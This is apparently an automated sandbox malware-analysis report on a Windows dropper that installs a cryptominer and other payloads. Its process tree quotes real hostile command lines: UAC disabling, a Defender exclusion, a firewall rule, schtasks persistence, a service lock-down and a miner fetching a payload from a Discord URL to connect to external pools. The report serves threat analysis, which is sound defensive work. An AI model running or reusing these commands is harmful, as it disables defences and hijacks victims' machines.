a02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 1900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd90b000000010000001200000044006900670069004300650072007400000014000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd155090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1756	powershell.exe
1080	lcDq23eDXskQBaEJxI0TthYF.exe
1080	lcDq23eDXskQBaEJxI0TthYF.exe
1080	lcDq23eDXskQBaEJxI0TthYF.exe
1080	lcDq23eDXskQBaEJxI0TthYF.exe
1080	lcDq23eDXskQBaEJxI0TthYF.exe
1080	lcDq23eDXskQBaEJxI0TthYF.exe
1080	lcDq23eDXskQBaEJxI0TthYF.exe
1080	lcDq23eDXskQBaEJxI0TthYF.exe
1736	gsqMDm4xp0qpvH7w0yVvaAb0.exe
1508	87Q9M1nYfzuP5odacHp1DUMF.exe
2516	AppLaunch.exe
2516	AppLaunch.exe
1644	dialer.exe
1644	dialer.exe
1644	dialer.exe
1644	dialer.exe
1592	gsqMDm4xp0qpvH7w0yVvaAb0.exe
1592	gsqMDm4xp0qpvH7w0yVvaAb0.exe
1592	gsqMDm4xp0qpvH7w0yVvaAb0.exe
1592	gsqMDm4xp0qpvH7w0yVvaAb0.exe
1592	gsqMDm4xp0qpvH7w0yVvaAb0.exe
1508	87Q9M1nYfzuP5odacHp1DUMF.exe
2052	87Q9M1nYfzuP5odacHp1DUMF.exe
2052	87Q9M1nYfzuP5odacHp1DUMF.exe
2052	87Q9M1nYfzuP5odacHp1DUMF.exe
2052	87Q9M1nYfzuP5odacHp1DUMF.exe
2052	87Q9M1nYfzuP5odacHp1DUMF.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe
1532	csrss.exe
568	injector.exe
568	injector.exe
568	injector.exe
1532	csrss.exe
568	injector.exe
1532	csrss.exe
568	injector.exe
568	injector.exe
568	injector.exe
568	injector.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
572	cxczNoZLbxame90AQVhkWLR0.tmp

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	1156	CasPol.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	1736	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Token: SeImpersonatePrivilege	1736	gsqMDm4xp0qpvH7w0yVvaAb0.exe
Token: SeDebugPrivilege	1508	87Q9M1nYfzuP5odacHp1DUMF.exe
Token: SeImpersonatePrivilege	1508	87Q9M1nYfzuP5odacHp1DUMF.exe
Token: SeDebugPrivilege	1508	87Q9M1nYfzuP5odacHp1DUMF.exe
Token: SeImpersonatePrivilege	1508	87Q9M1nYfzuP5odacHp1DUMF.exe
Token: SeSystemEnvironmentPrivilege	1532	csrss.exe
Token: SeSecurityPrivilege	1836	sc.exe
Token: SeSecurityPrivilege	1836	sc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
572	cxczNoZLbxame90AQVhkWLR0.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2240 wrote to memory of 1756	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	23
PID 2240 wrote to memory of 1756	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	23
PID 2240 wrote to memory of 1756	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	23
PID 2240 wrote to memory of 1756	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	23
PID 2240 wrote to memory of 1156	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	21
PID 2240 wrote to memory of 1156	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	21
PID 2240 wrote to memory of 1156	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	21
PID 2240 wrote to memory of 1156	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	21
PID 2240 wrote to memory of 1156	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	21
PID 2240 wrote to memory of 1156	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	21
PID 2240 wrote to memory of 1156	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	21
PID 2240 wrote to memory of 1156	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	21
PID 2240 wrote to memory of 1156	2240	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	21
PID 1156 wrote to memory of 676	1156	CasPol.exe	34
PID 1156 wrote to memory of 676	1156	CasPol.exe	34
PID 1156 wrote to memory of 676	1156	CasPol.exe	34
PID 1156 wrote to memory of 676	1156	CasPol.exe	34
PID 1156 wrote to memory of 1508	1156	CasPol.exe	33
PID 1156 wrote to memory of 1508	1156	CasPol.exe	33
PID 1156 wrote to memory of 1508	1156	CasPol.exe	33
PID 1156 wrote to memory of 1508	1156	CasPol.exe	33
PID 1156 wrote to memory of 2400	1156	CasPol.exe	31
PID 1156 wrote to memory of 2400	1156	CasPol.exe	31
PID 1156 wrote to memory of 2400	1156	CasPol.exe	31
PID 1156 wrote to memory of 2400	1156	CasPol.exe	31
PID 1156 wrote to memory of 2400	1156	CasPol.exe	31
PID 1156 wrote to memory of 2400	1156	CasPol.exe	31
PID 1156 wrote to memory of 2400	1156	CasPol.exe	31
PID 1156 wrote to memory of 1736	1156	CasPol.exe	32
PID 1156 wrote to memory of 1736	1156	CasPol.exe	32
PID 1156 wrote to memory of 1736	1156	CasPol.exe	32
PID 1156 wrote to memory of 1736	1156	CasPol.exe	32
PID 1156 wrote to memory of 1080	1156	CasPol.exe	35
PID 1156 wrote to memory of 1080	1156	CasPol.exe	35
PID 1156 wrote to memory of 1080	1156	CasPol.exe	35
PID 1156 wrote to memory of 1080	1156	CasPol.exe	35
PID 1156 wrote to memory of 2008	1156	CasPol.exe	37
PID 1156 wrote to memory of 2008	1156	CasPol.exe	37
PID 1156 wrote to memory of 2008	1156	CasPol.exe	37
PID 1156 wrote to memory of 2008	1156	CasPol.exe	37
PID 1156 wrote to memory of 2008	1156	CasPol.exe	37
PID 1156 wrote to memory of 2008	1156	CasPol.exe	37
PID 1156 wrote to memory of 2008	1156	CasPol.exe	37
PID 676 wrote to memory of 2404	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	74
PID 676 wrote to memory of 2404	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	74
PID 676 wrote to memory of 2404	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	74
PID 676 wrote to memory of 2404	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	74
PID 676 wrote to memory of 2404	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	74
PID 676 wrote to memory of 2404	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	74
PID 676 wrote to memory of 2404	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	74
PID 676 wrote to memory of 2764	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	41
PID 676 wrote to memory of 2764	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	41
PID 676 wrote to memory of 2764	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	41
PID 676 wrote to memory of 2764	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	41
PID 676 wrote to memory of 2764	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	41
PID 676 wrote to memory of 2764	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	41
PID 676 wrote to memory of 2764	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	41
PID 676 wrote to memory of 2516	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	40
PID 676 wrote to memory of 2516	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	40
PID 676 wrote to memory of 2516	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	40
PID 676 wrote to memory of 2516	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	40
PID 676 wrote to memory of 2516	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	40
PID 676 wrote to memory of 2516	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	40
PID 676 wrote to memory of 2516	676	5wnd2A7wo6BfQ2YU5OgrO2ST.exe	40

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
"C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe"
1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2240
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1156
- - C:\Users\Admin\Pictures\cxczNoZLbxame90AQVhkWLR0.exe
    "C:\Users\Admin\Pictures\cxczNoZLbxame90AQVhkWLR0.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2400
  - - C:\Users\Admin\AppData\Local\Temp\is-DVDCE.tmp\cxczNoZLbxame90AQVhkWLR0.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-DVDCE.tmp\cxczNoZLbxame90AQVhkWLR0.tmp" /SL5="$401A6,6584009,54272,C:\Users\Admin\Pictures\cxczNoZLbxame90AQVhkWLR0.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Program Files directory
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of FindShellTrayWindow
      PID:572
- - C:\Users\Admin\Pictures\gsqMDm4xp0qpvH7w0yVvaAb0.exe
    "C:\Users\Admin\Pictures\gsqMDm4xp0qpvH7w0yVvaAb0.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1736
  - - C:\Users\Admin\Pictures\gsqMDm4xp0qpvH7w0yVvaAb0.exe
      "C:\Users\Admin\Pictures\gsqMDm4xp0qpvH7w0yVvaAb0.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Loads dropped DLL
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:1592
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2708
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1532
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        
        PID:2808
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:664
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2484
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:568
      - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        6⤵
        Modifies boot configuration data using bcdedit
        
        PID:1896
      - C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2144
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:2404
      - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
        6⤵
        Executes dropped EXE
        
        PID:2036
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe -hide 1764
        7⤵
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 101b0e0f-1677-4e1a-bce5-9d222b256602 --tls --nicehash -o showlock.net:443 --rig-id 101b0e0f-1677-4e1a-bce5-9d222b256602 --tls --nicehash -o showlock.net:80 --rig-id 101b0e0f-1677-4e1a-bce5-9d222b256602 --nicehash --http-port 3433 --http-access-token 101b0e0f-1677-4e1a-bce5-9d222b256602 --randomx-wrmsr=-1
        7⤵
        
        PID:1764
      - C:\Users\Admin\AppData\Local\Temp\csrss\a4f5f1769e9bfd6c4510d7b73aa3332f.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\a4f5f1769e9bfd6c4510d7b73aa3332f.exe
        6⤵
        
        PID:1660
      - C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        6⤵
        
        PID:3036
- - C:\Users\Admin\Pictures\87Q9M1nYfzuP5odacHp1DUMF.exe
    "C:\Users\Admin\Pictures\87Q9M1nYfzuP5odacHp1DUMF.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
  - - C:\Users\Admin\Pictures\87Q9M1nYfzuP5odacHp1DUMF.exe
      "C:\Users\Admin\Pictures\87Q9M1nYfzuP5odacHp1DUMF.exe"
      4⤵
      Executes dropped EXE
      Checks for VirtualBox DLLs, possible anti-VM trick
      Suspicious behavior: EnumeratesProcesses
      PID:2052
- - C:\Users\Admin\Pictures\5wnd2A7wo6BfQ2YU5OgrO2ST.exe
    "C:\Users\Admin\Pictures\5wnd2A7wo6BfQ2YU5OgrO2ST.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:676
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Suspicious behavior: EnumeratesProcesses
      PID:2516
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:2764
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:2404
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        
        PID:2720
      - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:1836
- - C:\Users\Admin\Pictures\lcDq23eDXskQBaEJxI0TthYF.exe
    "C:\Users\Admin\Pictures\lcDq23eDXskQBaEJxI0TthYF.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Registers COM server for autorun
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:1080
- - C:\Users\Admin\Pictures\ed80OmEWuScDikzRSZGz2MqO.exe
    "C:\Users\Admin\Pictures\ed80OmEWuScDikzRSZGz2MqO.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2008
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe" -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1756

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1336
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1644

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231218050514.log C:\Windows\Logs\CBS\CbsPersist_20231218050514.cab
1⤵
- Drops file in Windows directory
PID:1916

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:876

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
PID:2708

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry